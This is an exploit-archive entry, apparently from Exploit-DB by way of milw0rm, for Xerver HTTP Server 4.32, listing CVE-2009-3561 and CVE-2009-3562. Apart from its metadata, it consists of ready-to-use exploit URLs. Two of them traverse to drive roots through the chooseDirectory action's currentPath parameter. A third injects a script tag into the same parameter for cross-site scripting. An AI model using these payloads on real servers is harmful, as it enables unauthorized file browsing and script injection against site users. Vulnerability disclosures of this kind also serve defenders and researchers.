Xerver HTTP Server 4.32 - Cross-Site Scripting / Directory Traversal

Author: Stack
type: remote
platform: multiple
port: 
date_added: 2009-09-17  
date_updated:   
verified: 1  
codes: OSVDB-58645;CVE-2009-3562;OSVDB-58644;CVE-2009-3561  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 9718.txt  
Xerver HTTP Server v4.32 XSS / Directory Traversal Vulnerability


By Stack


Directory Traversal Exploit :

http://127.0.0.1:32123/action=chooseDirectory&currentPath=d:%5C

http://127.0.0.1:32123/action=chooseDirectory&currentPath=c:\




XSS Exploit :


http://127.0.0.1:32123/action=chooseDirectory&currentPath='">><script>alert('XSS By Stack')</script>

# milw0rm.com [2009-09-18]